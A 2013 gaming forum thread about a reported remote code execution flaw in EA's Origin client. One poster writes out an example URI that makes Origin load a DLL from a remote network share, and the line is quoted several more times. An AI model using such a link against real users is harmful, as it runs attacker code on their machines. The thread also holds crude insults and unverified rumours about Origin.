More EA News : Bug in Origin game platform allows attackers to hijack player PCs
28 replies, posted
[url]http://arstechnica.com/security/2013/03/bug-on-eas-origin-game-platform-allows-attackers-to-hijack-player-pcs/[/url]
[QUOTE]More than 40 million people could be affected by a vulnerability researchers uncovered in EA's Origin online game platform allowing attackers to remotely execute malicious code on players' computers.[/QUOTE]
Boy, when it rains.
So many bad news from EA lately, when will this series end?
Never?
[QUOTE=Fine Hats;39963261]Boy, when it rains.[/QUOTE]
It POURS
Really do hope that I do not have to fucking worry about it as I do run origin, goddamn EA fix your shit it really shouldn't be that hard to understand that bug checking is necessary and that quality means more than quantity.
Origin was pretty much a virus to begin with anyways.
It scans your entire computer for cheating/pirated software then reports it.
I [I][B]almost[/B][/I] feel bad for EA.
[I][B]ALMOST.[/B][/I]
[QUOTE=Computrix;39963477]Origin was pretty much a virus to begin with anyways.
It scans your entire computer for cheating/pirated software then reports it.[/QUOTE]
Is there a source on this?
Not that I'm defending Origin, It's a horrible platform but this sounds far fetched even for EA's standards.
[QUOTE=Computrix;39963477]Origin was pretty much a virus to begin with anyways.
It scans your entire computer for cheating/pirated software then reports it.[/QUOTE]
No it doesn't. That turned out to be complete bullshit. Don't believe everything you read on the internet.
Now about this "exploit": Steam supposedly has the same "exploit". The reason I'm using quotations is because all this really is doing is telling Origin to do open something via a protocol. (ex: [URL]steam://install/440[/URL] )
Didn't Steam have a similar problem a while back?
[QUOTE=Shocky;39963550]Didn't Steam have a similar problem a while back?[/QUOTE]
Steam always problems with hackers- they know how to deal with it.
Not so sure about EA though.
[QUOTE=Computrix;39963477]Origin was pretty much a virus to begin with anyways.
It scans your entire computer for cheating/pirated software then reports it.[/QUOTE]
Actually, My friend proved this false by pirating mass effect 3 and when he used a legitimate copy of dead space 3, he still got the n7 armor from mass effect despite not owning it. It would be pretty stupid of them to ban you for pirating their games if you are also a paying customer, after all.
[QUOTE=Aphtonites;39963519]Is there a source on this?
Not that I'm defending Origin, It's a horrible platform but this sounds far fetched even for EA's standards.[/QUOTE]
It was a line in the TOS that hinted at it, and when people flipped their shit EA went and changed it.
[editline]19th March 2013[/editline]
Also i'm pretty sure steam had this issue at one point as well.
[QUOTE=Zanfall;39963546]No it doesn't. That turned out to be complete bullshit. Don't believe everything you read on the internet.
Now about this "exploit": Steam supposedly has the same "exploit". The reason I'm using quotations is because all this really is doing is telling Origin to do open something via a protocol. (ex: [URL]steam://install/440[/URL] )[/QUOTE]that's not a fucking exploit.
that's a feature. steam can install games with that uri.
origin can execute REMOTE DLLs with its uri handling.
[code]origin://LaunchGame/71503?CommandParams= -openautomate \\68.26.169.37\virus.dll[/code]
steam cannot. stop posting unless you know what you're posting about
[B]THIS IS BULLSHIT, SEE [URL="http://facepunch.com/showthread.php?t=1254723&p=39961476&viewfull=1#post39961476"]HERE[/URL] FOR WHY[/B]
As long as you don't click on any suspicious links and generally aren't retarded, you won't have to worry. This is literally the same level of "exploit" as email phishers
Every single day gets worse for EA
Hhaahhaha
Did the OP even read the article? It specifically mentions that Steam had the same issue back in October.
[QUOTE=TehWhale;39963694]that's not a fucking exploit.
that's a feature. steam can install games with that uri.
origin can execute REMOTE DLLs with its uri handling.
[code]origin://LaunchGame/71503?CommandParams= -openautomate \\68.26.169.37\virus.dll[/code]
steam cannot. stop posting unless you know what you're posting about[/QUOTE]
Obviously what I posted wasn't exploit. But you are correct the Steam equivalent obviously much tamer. I think the most you could do with it would be to redirect endlessly to the same page using 'steam://openurl/<url>' to open a shitload of browser windows. But that assumes the user set their browser to auto-execute anything using the steam:// protocol
origin is a much better client than steam imo. I've been using it alongside steam for awhile now and it responds three times more quickly than steam does when moving between tabs and windows.
[QUOTE=Ericson666;39963721][B]THIS IS BULLSHIT, SEE [URL="http://facepunch.com/showthread.php?t=1254723&p=39961476&viewfull=1#post39961476"]HERE[/URL] FOR WHY[/B]
As long as you don't click on any suspicious links and generally aren't retarded, you won't have to worry. This is literally the same level of "exploit" as email phishers[/QUOTE]
Yeah but it's ea so everyone will completely ignore you and keep posting about how ea need to sort their shit out and need to die in a fire (even though steam had this but hey all Heil gaben right guys)
[QUOTE=darkrei9n;39963871]Did the OP even read the article? It specifically mentions that Steam had the same issue back in October.[/QUOTE]
Yeah but that's Valve and they're perfect. This is Origin and that's TERRIBLE AND THEY SHOULD ALL FACE THE DEATH PENALTY.
Lets all go suck Gabe's girthy cock!
[QUOTE=Ericson666;39963721][B]THIS IS BULLSHIT, SEE [URL="http://facepunch.com/showthread.php?t=1254723&p=39961476&viewfull=1#post39961476"]HERE[/URL] FOR WHY[/B]
As long as you don't click on any suspicious links and generally aren't retarded, you won't have to worry. This is literally the same level of "exploit" as email phishers[/QUOTE]
It's not bullshit, think about it: you could embed this sort of link anywhere. Imagine a screenshot that turns out to the a loaded link - a person clicks it to enlarge and bam. I'm sure you can think of many more examples.
It's not really a flaw with the Origin platform, but OpenAutomate ([url=https://developer.nvidia.com/openautomate]nVidia's API[/url] btw) - but that doesn't matter. It's the entry vector people need to be aware of, not where to point blame.
Geeze, the bigger they are, the harder they fall indeed.
[QUOTE=subenji99;39963964]It's not bullshit, think about it: you could embed this sort of link anywhere. Imagine a screenshot that turns out to the a loaded link - a person clicks it to enlarge and bam. I'm sure you can think of many more examples.
It's not really a flaw with the Origin platform, but OpenExecute - but that doesn't matter. It's the entry vector people need to be aware of, not where to point blame.[/QUOTE]
Pretty much every web browser by default will warn you if something tries to open an external program and gives you the option to change your mind.
When you encounter many such links, and lets be fair, heavy Battlefield players are one such likely group for example, you're probably just going to tell your browser not to nag you anymore. It's not an effective method of protection.
Did EA steal something from a Gypsy fortune teller or something?
[QUOTE=Shocky;39963550]Didn't Steam have a similar problem a while back?[/QUOTE]
I can't hear you through Gabe's ass on my face!
[QUOTE=TehWhale;39963694]that's not a fucking exploit.
that's a feature. steam can install games with that uri.
origin can execute REMOTE DLLs with its uri handling.
[code]origin://LaunchGame/71503?CommandParams= -openautomate \\68.26.169.37\virus.dll[/code]
steam cannot. stop posting unless you know what you're posting about[/QUOTE]
you can do basically exactly the same thing with steam and crysis 3 lol.
Sorry, you need to Log In to post a reply to this thread.